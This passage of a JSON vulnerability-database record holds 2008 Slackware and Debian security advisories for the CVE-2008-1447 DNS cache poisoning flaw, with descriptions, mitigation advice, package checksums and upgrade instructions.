package:\n5b1087e6a0dc79ebf06144f44d5bb52f bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nda76550505d62f0d902b710a078d1020 bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nSlackware -current package:\nc255530e46f4cff8080a20b6c8d12443 bind-9.4.2_P1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nThen, restart the nameserver:\n > /etc/rc.d/rc.bind restart", "modified": "2008-07-10T04:29:01", "published": "2008-07-10T04:29:01", "id": "SSA-2008-191-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New 
ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\n\nMore details about the issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz:\n Upgraded to ruby-1.8.6-p287.\n This fixes several bugs in the previous Ruby update, including a security\n issue where the DNS resolver did not randomize the source port and\n transaction id sufficiently.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n68f319999719565f3f05acf61e791f92 ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n967059ae6d9a3a3ea609472e4f3c3903 ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbc821c4e4eee3608e1c5e2e30238b450 ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.8.6_p287-i486-1_slack12.1.tgz", "modified": "2008-11-29T21:37:03", "published": "2008-11-29T21:37:03", "id": "SSA-2008-334-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.371754", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:21:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1605-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS spoofing 
and cache poisoning attacks. Among\nother things, successful attacks can lead to misdirected web traffic\nand email rerouting.\n\nAt this time, it is not possible to implement the recommended\ncountermeasures in the GNU libc stub resolver. The following\nworkarounds are available:\n\n1. Install a local BIND 9 resolver on the host, possibly in\nforward-only mode. BIND 9 will then use source port randomization\nwhen sending queries over the network. (Other caching resolvers can\nbe used instead.)\n\n2. Rely on IP address spoofing protection if available. Successful\nattacks must spoof the address of one of the resolvers, which may not\nbe possible if the network is guarded properly against IP spoofing\nattacks (both from internal and external sources).\n\nThis DSA will be updated when patches for hardening the stub resolver\nare available.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:05:37", "published": "2008-07-08T17:05:37", "id": "DEBIAN:DSA-1605-1:9D185", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00186.html", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:28:32", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1617-1 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nJuly 25, 2008 http://www.debian.org/security/faq\n- 
------------------------------------------------------------------------\n\nPackage : refpolicy\nVulnerability : incompatible policy\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nDebian Bug : 490271\n\nIn DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate\nthe threat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). The incompatibility affects both\nthe 'targeted' and 'strict' policy packages supplied by this version\nof refpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the\nupdated packages will attempt to update the bind policy module on\nsystems where it had been previously loaded and where the previous\nversion of refpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with\npolicy module upgradeability in mind, and because SELinux-enabled\nDebian systems often have some degree of site-specific policy\ncustomization, it is difficult to assure that the new bind policy can\nbe successfully upgraded. To this end, the package upgrade will not\nabort if the bind policy update fails. The new policy module can be\nfound at /usr/share/selinux/refpolicy-targeted/bind.pp after\ninstallation. Administrators wishing to use the bind service policy\ncan reconcile any policy incompatibilities and install the upgrade\nmanually thereafter. 
A more detailed discussion of the corrective\nprocedure may be found here:\n\n http://wiki.debian.org/SELinux/Issues/BindPortRandomization\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.0.20061018-5.1+etch1. The unstable distribution (sid) is\nnot affected, as subsequent refpolicy releases have incorporated an\nanalogous change.\n\nWe recommend that you upgrade your refpolicy packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018.orig.tar.gz\n Size/MD5 checksum: 571487 1bb326ee1b8aea1fa93c3bd86a3007ee\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018-5.1+etch1.diff.gz\n Size/MD5 checksum: 53515 bd171f0cfa9adc59d451d176fb32c913\n http://security.debian.org/pool/updates/main/r/refpolicy/refpolicy_0.0.20061018-5.1+etch1.dsc\n Size/MD5 checksum: 859 52bc8ea0cab864e990e9dacc4db3b678\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-strict_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 1541610 626c93fc13beaa01ff151d9103a7860b\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-doc_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 289230 b082a861eda93f9bc06dd2e2f03ba89d\n 
http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-targeted_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 1288314 c00ed4f0ea4ddbb8dd945c24c710c788\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-src_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 595490 841f616c8f08b22ed7077c21c1065026\n http://security.debian.org/pool/updates/main/r/refpolicy/selinux-policy-refpolicy-dev_0.0.20061018-5.1+etch1_all.deb\n Size/MD5 checksum: 418666 bee3f41fe8771b7b88693937814494a3\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-07-25T06:29:42", "published": "2008-07-25T06:29:42", "id": "DEBIAN:DSA-1617-1:2477C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00201.html", "title": "[SECURITY] [DSA 1617-1] New refpolicy packages fix incompatible policy", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1604-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that 
properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThe BIND 8 legacy code base could not be updated to include the\nrecommended countermeasure (source port randomization, see DSA-1603-1\nfor details). There are two ways to deal with this situation:\n\n1. Upgrade to BIND 9 (or another implementation with source port\nrandomization). The documentation included with BIND 9 contains a\nmigration guide.\n\n2. Configure the BIND 8 resolver to forward queries to a BIND 9\nresolver. Provided that the network between both resolvers is trusted,\nthis protects the BIND 8 resolver from cache poisoning attacks (to the\nsame degree that the BIND 9 resolver is protected).\n\nThis problem does not apply to BIND 8 when used exclusively as an\nauthoritative DNS server. It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended.\nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:04:04", "published": "2008-07-08T17:04:04", "id": "DEBIAN:DSA-1604-1:E1CB3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00185.html", "title": "[SECURITY] [DSA 1604-1] BIND 8 deprecation notice", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- 
------------------------------------------------------------------------\nDebian Security Advisory DSA-1623-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 31, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dnsmasq\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's dnsmasq packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nThis update also switches the random number generator to Dan\nBernstein's SURF.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.35-1+etch4. 
Packages for alpha will be provided later.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.43-1.\n\nWe recommend that you upgrade your dnsmasq package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.dsc\n Size/MD5 checksum: 596 3834461c89e55467b4b65ed4ac209e81\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35.orig.tar.gz\n Size/MD5 checksum: 252901 ad1fafeaf3442685cfe16613e0f8b777\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.diff.gz\n Size/MD5 checksum: 19202 4ced7768f49198bd43bbbd24f2a3d3e4\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_amd64.deb\n Size/MD5 checksum: 188278 8fb55f694db9fdfccaa86d134e937777\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_arm.deb\n Size/MD5 checksum: 181746 4caf23f31de937b817e12ade7d132eac\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_hppa.deb\n Size/MD5 checksum: 190490 66730e785683655b058d11aa70346be4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_i386.deb\n Size/MD5 checksum: 184546 
1fbdd71e81a1e05d68b0f88eaeb00b10\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_ia64.deb\n Size/MD5 checksum: 223758 011f283b71ef0f9e07d5a9dce25db505\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mips.deb\n Size/MD5 checksum: 189846 5c67cca2eaedc1dff80c5fd05aa1d33f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mipsel.deb\n Size/MD5 checksum: 191824 dfd87d69a7751f1e6ef2d0f1ede052ff\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_powerpc.deb\n Size/MD5 checksum: 186890 93701abcca5421beddab015a7f35af99\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_s390.deb\n Size/MD5 checksum: 186396 6f19f6c8d803c3d57e01e73fe1e11886\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_sparc.deb\n Size/MD5 checksum: 182910 f360078c14f715e90e60124b4ede2be9\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-31T16:45:43", "published": "2008-07-31T16:45:43", "id": "DEBIAN:DSA-1623-1:F6633", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00208.html", "title": "[SECURITY] [DSA 1623-1] New dnsmasq packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:19:47", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1603-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nNote that this security update changes BIND network behavior in a\nfundamental way, and the following steps are recommended to ensure a\nsmooth upgrade.\n\n\n1. Make sure that your network configuration is compatible with source\nport randomization. If you guard your resolver with a stateless packet\nfilter, you may need to make sure that no non-DNS services listen on\nthe 1024--65535 UDP port range and open it at the packet filter. For\ninstance, packet filters based on etch's Linux 2.6.18 kernel only\nsupport stateless filtering of IPv6 packets, and therefore pose this\nadditional difficulty. (If you use IPv4 with iptables and ESTABLISHED\nrules, networking changes are likely not required.)\n\n2. Install the BIND 9 upgrade, using "apt-get update" followed by\n"apt-get install bind9". 
Verify that the named process has been\nrestarted and answers recursive queries. (If all queries result in\ntimeouts, this indicates that networking changes are necessary; see the\nfirst step.)\n\n3. Verify that source port randomization is active. Check that the\n/var/log/daemon.log file does not contain messages of the following\nform\n\n named[6106]: /etc/bind/named.conf.options:28: using specific\n query-source port suppresses port randomization and can be insecure.\n\nright after the "listening on IPv6 interface" and "listening on IPv4\ninterface" messages logged by BIND upon startup. If these messages are\npresent, you should remove the indicated lines from the configuration,\nor replace the port numbers contained within them with "*" sign (e.g.,\nreplace "port 53" with "port *").\n\nFor additional certainty, use tcpdump or some other network monitoring\ntool to check for varying UDP source ports. If there is a NAT device\nin front of your resolver, make sure that it does not defeat the\neffect of source port randomization.\n\n4. If you cannot activate source port randomization, consider\nconfiguring BIND 9 to forward queries to a resolver which can, possibly\nover a VPN such as OpenVPN to create the necessary trusted network link.\n(Use BIND's forward-only mode in this case.)\n\n\nOther caching resolvers distributed by Debian (PowerDNS, MaraDNS,\nUnbound) already employ source port randomization, and no updated\npackages are needed. BIND 9.5 up to and including version\n1:9.5.0.dfsg-4 only implements a weak form of source port\nrandomization and needs to be updated as well. 
For information on\nBIND 8, see DSA-1604-1, and for the status of the libc stub resolver,\nsee DSA-1605-1.\n\nThe updated bind9 packages contain changes originally scheduled for\nthe next stable point release, including the changed IP address of\nL.ROOT-SERVERS.NET (Debian bug #449148).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.dsc\n Size/MD5 checksum: 897 aeb15f8babb1e6e38367b9f19fea87da\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz\n Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.diff.gz\n Size/MD5 checksum: 302126 521abea46b1104f2251cc398f30af303\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch3_all.deb\n Size/MD5 checksum: 189560 46ff778db82d2e171d292ecac93ea9b6\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 98154 bbdbcd3d0840f5ffcf4eaddf5a8c253f\n 
http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 1407380 ca8995875e76a25de6f32a47f62ea876\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 226088 93100774ae6da891caf9fa27a2134cdf\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 112616 bca5dcca8abff15f4f9cc911f9f94818\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 322286 677fdcf8e9a8c272a08ed47a79e09209\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 190084 87d64554a1cdde9f58cc850f7d5961a1\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 96508 48ba9fc0e884f093e95988bd4e088b9c\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 564862 7b23948d7c741d4f287698d28385ce71\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 188742 5dd8024a9864137f4529785fcc9c9231\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 116534 2e7dc9ea95bae40dc396ff504abb03bb\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_alpha.deb\n Size/MD5 checksum: 115784 b961fd6c797a2d1422ae588bfc25ed9d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 224294 4d33744bb92300b061cad41dd8de7ea5\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 1111932 e43ced7eae496d7835247a068bef4a66\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 190742 9e39ced5d3464594b9dda6ce683fc653\n 
http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 319008 e36a35983ebc5061e8669ef7f004a851\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 552414 c93c2863bddd5661010ae3472e210aa8\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 95922 f114eb76add0d7dabad1d082d38ccf08\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 117072 a70d1d96ea01aa24fb9642e09133824f\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 187646 70372cec3522356dcd00901ea64714d4\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 111270 6dc6edfcca9fecb28c7e66d31ab14a74\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 114722 905d0f9b7b5ebc0308c54158e71d03cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_amd64.deb\n Size/MD5 checksum: 96704 09d3c850f12a6c1f6eab4e800a118c87\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 107888 b2ea4933e233a1af8dd1e5ee641999a2\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 112714 27b1fde9b144cacb1ae06a441d7c5787\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 116076 cafc3294083de02518ab5fe0f0488c3b\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 532206 a005bdff779fed950e4750231d0184b2\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 187364 72fdca60a20876be71b678028cefc316\n 
http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95752 bce98b259a2821d59f6e6b441b491d77\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 182950 26a15d51a4e6f1ea1dda99ab4d3ea34c\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 217686 97f538e27ab7c765b514a9ce59869a41\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 95168 374d7f18915fc8eb6b775d272cf28f2e\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 1074498 fdada51888027e9c3e89961b31a48ded\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_arm.deb\n Size/MD5 checksum: 311078 43d1c044b0cc81b072b8962ad3b8f019\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 96986 bba6d0a611b7088e284564b430f91405\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 97140 14f3dacd102208700660873637dea18b\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 185570 012eb78b091c0991988a95160df7d65d\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 115822 d717418b7ec770e5419e0941670eab19\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 543342 201331119c074430d503b68dc210e187\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 1258146 2f092d0708338d0a3ac8924218fee0d7\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 315070 bc8d94bec7b1c8cf80f64fb72d1f38e5\n 
http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 187942 1cd85afac13850d1807a5b50b9d3262f\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 114612 912dc2007ca7cb6097a3e6a4e98897e3\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 217378 49276452262a155ba17db2ad8c66e3e2\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_hppa.deb\n Size/MD5 checksum: 113466 428d268ce8ad5386c1af758ca4cff2ce\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 106034 ce4d4a024472317185d4c6492b7d30df\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 180292 1fd02a86a31b68a8db2407904495a0db\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94838 9dbc2734dd8b8bb7c3e7684faabea64e\n 